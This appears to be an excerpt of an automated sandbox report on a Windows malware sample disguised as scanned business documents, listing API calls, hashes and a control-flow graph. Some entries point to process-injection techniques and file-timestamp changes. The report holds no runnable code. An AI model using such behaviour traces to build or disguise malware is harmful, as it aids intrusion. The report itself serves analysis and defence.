                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$Copy
                                                      • String ID:
                                                      • API String ID: 3226157194-0
                                                      • Opcode ID: 8e4124bcdb59c996fda24d9e98332b046e9ca4e1b85fc20dba1231af4154920b
                                                      • Instruction ID: af167d8c52ec37e74a6fa89170c113c765794d8dee69c3e210d98ac543eb648a
                                                      • Opcode Fuzzy Hash: 8e4124bcdb59c996fda24d9e98332b046e9ca4e1b85fc20dba1231af4154920b
                                                      • Instruction Fuzzy Hash: B4B15171D2112DABDF11EFA4CC85EEEBB7DEF49350F1040A6F609E6141EA309A588F61

                                                      Control-flow Graph

                                                      control_flow_graph 1907 2b5aa9-2b5ace 1908 2b5ad0-2b5ad2 1907->1908 1909 2b5ad7-2b5ad9 1907->1909 1910 2b5ca5-2b5cb4 call 2a0a8c 1908->1910 1911 2b5adb-2b5af5 call 2af2c6 call 2af2d9 call 2b27ec 1909->1911 1912 2b5afa-2b5b1f 1909->1912 1911->1910 1914 2b5b21-2b5b24 1912->1914 1915 2b5b26-2b5b2c 1912->1915 1914->1915 1918 2b5b4e-2b5b53 1914->1918 1919 2b5b4b 1915->1919 1920 2b5b2e-2b5b46 call 2af2c6 call 2af2d9 call 2b27ec 1915->1920 1923 2b5b55-2b5b61 call 2b9424 1918->1923 1924 2b5b64-2b5b6d call 2b564e 1918->1924 1919->1918 1953 2b5c9c-2b5c9f 1920->1953 1923->1924 1935 2b5ba8-2b5bba 1924->1935 1936 2b5b6f-2b5b71 1924->1936 1939 2b5bbc-2b5bc2 1935->1939 1940 2b5c02-2b5c23 WriteFile 1935->1940 1941 2b5b73-2b5b78 1936->1941 1942 2b5b95-2b5b9e call 2b542e 1936->1942 1947 2b5bf2-2b5c00 call 2b56c4 1939->1947 1948 2b5bc4-2b5bc7 1939->1948 1944 2b5c2e 1940->1944 1945 2b5c25-2b5c2b GetLastError 1940->1945 1949 2b5b7e-2b5b8b call 2b55e1 1941->1949 1950 2b5c6c-2b5c7e 1941->1950 1954 2b5ba3-2b5ba6 1942->1954 1955 2b5c31-2b5c3c 1944->1955 1945->1944 1947->1954 1956 2b5bc9-2b5bcc 1948->1956 1957 2b5be2-2b5bf0 call 2b5891 1948->1957 1962 2b5b8e-2b5b90 1949->1962 1951 2b5c89-2b5c99 call 2af2d9 call 2af2c6 1950->1951 1952 2b5c80-2b5c83 1950->1952 1951->1953 1952->1951 1960 2b5c85-2b5c87 1952->1960 1966 2b5ca4 1953->1966 1954->1962 1963 2b5c3e-2b5c43 1955->1963 1964 2b5ca1 1955->1964 1956->1950 1965 2b5bd2-2b5be0 call 2b57a3 1956->1965 1957->1954 1960->1966 1962->1955 1971 2b5c69 1963->1971 1972 2b5c45-2b5c4a 1963->1972 1964->1966 1965->1954 1966->1910 1971->1950 1976 2b5c4c-2b5c5e call 2af2d9 call 2af2c6 1972->1976 1977 2b5c60-2b5c67 call 2af2a3 1972->1977 1976->1953 1977->1953
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JO(
                                                      • API String ID: 0-3222809140
                                                      • Opcode ID: efc0492878468c842b337cc28abdb262128306867a44b827c73631cc06825966
                                                      • Instruction ID: c40c47abb8e96ea4f469ff85055c7c486277085893e0967ae94c0e7f5f317538
                                                      • Opcode Fuzzy Hash: efc0492878468c842b337cc28abdb262128306867a44b827c73631cc06825966
                                                      • Instruction Fuzzy Hash: 0951D271D3062A9FCB11AFA4C945FEEBFB9AF05394F14001AF400AF291DB7599218B61
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00283B0F,SwapMouseButtons,00000004,?), ref: 00283B40
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00283B0F,SwapMouseButtons,00000004,?), ref: 00283B61
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00283B0F,SwapMouseButtons,00000004,?), ref: 00283B83
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 88cc99f3f6724ccace105dee97bb47aa17cded22f5a13f4e964f3ef872151512
                                                      • Instruction ID: 1dfa25dc2907cabe1609de14b5cb25eb0963502832e24b970fc21278f55e2578
                                                      • Opcode Fuzzy Hash: 88cc99f3f6724ccace105dee97bb47aa17cded22f5a13f4e964f3ef872151512
                                                      • Instruction Fuzzy Hash: F9112AB9521209FFDB21DFA5DC44AEEB7BCEF08B89B108459A805D7150E271DF509760
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03201A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03201AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03201B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                      • Instruction ID: 1e819c53ab65cffe7b9fd2fdfbcf4cc542c5820eb419b942e47adff2804193d2
                                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                      • Instruction Fuzzy Hash: FA620A34A24258DBEB24CFA4C840BDEB376EF58300F1091A9D10DEB2D1E7B59E85CB59
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 002C33A2
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00283A04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_wcslen
                                                      • String ID: Line:
                                                      • API String ID: 2289894680-1585850449
                                                      • Opcode ID: 074097080e3df8800061581881a6be2dc8f294cbb5f1cbdd172e8e966a16d1ae
                                                      • Instruction ID: 75fdf6ffac3a7cbd77384d56f80e733e9a19dae1994a6b67699122b4c4367e5b
                                                      • Opcode Fuzzy Hash: 074097080e3df8800061581881a6be2dc8f294cbb5f1cbdd172e8e966a16d1ae
                                                      • Instruction Fuzzy Hash: 2E31E47542A301AAD322FB10DC45FEBB7DCAB40B11F00495AF599930E1EF709669CBC2
                                                      APIs
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 002C2C8C
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                        • Part of subcall function 00282DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00282DC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen
                                                      • String ID: X$`e4
                                                      • API String ID: 779396738-2432232201
                                                      • Opcode ID: 622baab5cd37a6d5b633f29f5659997fe62723994cb407aea1de40d1b92d5ade
                                                      • Instruction ID: fc6f3830e42abae94efb03ac9f3049ccaa3cd3311029e7718bff302de20c1fbd
                                                      • Opcode Fuzzy Hash: 622baab5cd37a6d5b633f29f5659997fe62723994cb407aea1de40d1b92d5ade
                                                      • Instruction Fuzzy Hash: BA21A875A202589FCF01EF94C845BDE7BFCAF49715F00405AE405BB281DBB45A5D8F61
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 002A0668
                                                        • Part of subcall function 002A32A4: RaiseException.KERNEL32(?,?,?,002A068A,?,00351444,?,?,?,?,?,?,002A068A,00281129,00348738,00281129), ref: 002A3304
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 002A0685
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: c6565bab13cf4ba660454e3abd202bc65f0fa8c2f7bdf6d6508bbcb655f12ca9
                                                      • Instruction ID: 9225419dbd0c3e1cda1ac375199ad4399304a2437e1ebe7efd176ee929f58534
                                                      • Opcode Fuzzy Hash: c6565bab13cf4ba660454e3abd202bc65f0fa8c2f7bdf6d6508bbcb655f12ca9
                                                      • Instruction Fuzzy Hash: FBF02234C2020EB7CF04FAA4D886C9E7B6C6E02344B604031F914C6492EF70EA35C9D0
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002F302F
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002F3044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 66adcba29dec523dfddc010807b0e05053a391cb966c14ee7e02f9d870e65e49
                                                      • Instruction ID: bbffb2208fe58f3f02b2405ce106a62cde52c25c87241ca60a397dd8d94cc5ae
                                                      • Opcode Fuzzy Hash: 66adcba29dec523dfddc010807b0e05053a391cb966c14ee7e02f9d870e65e49
                                                      • Instruction Fuzzy Hash: 0AD05EB254032867DE20A7A4AC0EFCB3A6CDB09750F0006A1B655E6091DBF0A985CAD0
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003082F5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 003082FC
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 003084DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                      • String ID:
                                                      • API String ID: 146820519-0
                                                      • Opcode ID: b4b1d7021ed1f2eafc56abed7e7b86fbd4dad1899137c6134b9a38e49875e8b1
                                                      • Instruction ID: b65c13700cc7db05b6c1cb49ea57f48b41e43138f2bd2a00995fd02af004fff0
                                                      • Opcode Fuzzy Hash: b4b1d7021ed1f2eafc56abed7e7b86fbd4dad1899137c6134b9a38e49875e8b1
                                                      • Instruction Fuzzy Hash: 38128A75A093019FC715DF28C494B2ABBE5BF88318F15895DE8898B392CB31ED45CF92
                                                      APIs
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00281BF4
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00281BFC
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00281C07
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00281C12
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00281C1A
                                                        • Part of subcall function 00281BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00281C22
                                                        • Part of subcall function 00281B4A: RegisterWindowMessageW.USER32(00000004,?,002812C4), ref: 00281BA2
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0028136A
                                                      • OleInitialize.OLE32 ref: 00281388
                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 002C24AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: ca8876c44c9ab15162ff9ed2fa679d78d209a53a946bc37c7fdc78040333251b
                                                      • Instruction ID: f38e0caae83b3b1547f631649eb0aafa7f291affab1231862ec63d88d91fda71
                                                      • Opcode Fuzzy Hash: ca8876c44c9ab15162ff9ed2fa679d78d209a53a946bc37c7fdc78040333251b
                                                      • Instruction Fuzzy Hash: A271C2B89213408FC797EF7AA9457953BECBB8A346B549A2AD40AC73B1FB304455CF40
                                                      APIs
                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,002B85CC,?,00348CC8,0000000C), ref: 002B8704
                                                      • GetLastError.KERNEL32(?,002B85CC,?,00348CC8,0000000C), ref: 002B870E
                                                      • __dosmaperr.LIBCMT ref: 002B8739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                      • String ID:
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,002F2CD4,?,?,?,00000004,00000001), ref: 002F2FF2
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002F3006
                                                      • CloseHandle.KERNEL32(00000000,?,002F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002F300D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: File$CloseCreateHandleTime
                                                      • String ID:
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 002917F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CALL
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 002F6F6B
                                                        • Part of subcall function 00284ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EFD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: LibraryLoad_wcslen
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID: EA06
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00283908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03201A5B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03201AF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03201B13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1659326696.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3200000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      APIs
                                                        • Part of subcall function 00284E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E9C
                                                        • Part of subcall function 00284E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00284EAE
                                                        • Part of subcall function 00284E90: FreeLibrary.KERNEL32(00000000,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EC0
                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EFD
                                                        • Part of subcall function 00284E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E62
                                                        • Part of subcall function 00284E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284E74
                                                        • Part of subcall function 00284E59: FreeLibrary.KERNEL32(00000000,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E87
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: Library$Load$AddressFreeProc
                                                      • String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      APIs
                                                        • Part of subcall function 002B4C7D: RtlAllocateHeap.NTDLL(00000008,00281129,00000000,?,002B2E29,00000001,00000364,?,?,?,002AF2DE,002B3863,00351444,?,0029FDF5,?), ref: 002B4CBE
                                                      • _free.LIBCMT ref: 002B506C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID:
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000008,00281129,00000000,?,002B2E29,00000001,00000364,?,?,?,002AF2DE,002B3863,00351444,?,0029FDF5,?), ref: 002B4CBE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: f568e841dbb7d75397d08b5791b2d73d0532a9c68d3809b881d823f92310986b
                                                      • Instruction ID: 940fd5941e7b5c036ba132e15021e34de71b9af06b73d8ea3e1f135c3bf9e3a8
                                                      • Opcode Fuzzy Hash: f568e841dbb7d75397d08b5791b2d73d0532a9c68d3809b881d823f92310986b
                                                      • Instruction Fuzzy Hash: AFF0B43167222567DB217F629D45BDA3F88AF81BE1F144123FD19E61A3CE70DC2046E0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 0fa07ee672ef72ed66d767e09744c959994e108268dced74c6ab37e49636b3bd
                                                      • Instruction ID: db14f882722bf4936bd6724ec271359f585810d6083aa0b4deb9cab08c75ddfe
                                                      • Opcode Fuzzy Hash: 0fa07ee672ef72ed66d767e09744c959994e108268dced74c6ab37e49636b3bd
                                                      • Instruction Fuzzy Hash: 35E0E53217022667D7216EAA9C00BDA3649AB827F0F0A0031BC0492491DF50DD2185E2
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284F6D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 260d0a9451b1b91caee5837fb95ee2056931206a68c16459c0f79dc24b3edb77
                                                      • Instruction ID: 8ad878a58b29df0e67e65ddcedfb700a78b0a012d642022fdfa905ebac746807
                                                      • Opcode Fuzzy Hash: 260d0a9451b1b91caee5837fb95ee2056931206a68c16459c0f79dc24b3edb77
                                                      • Instruction Fuzzy Hash: 61F03075126753CFDB34BF64D490812B7E4BF24319315897EE2DA82951C7719854DF10
                                                      APIs
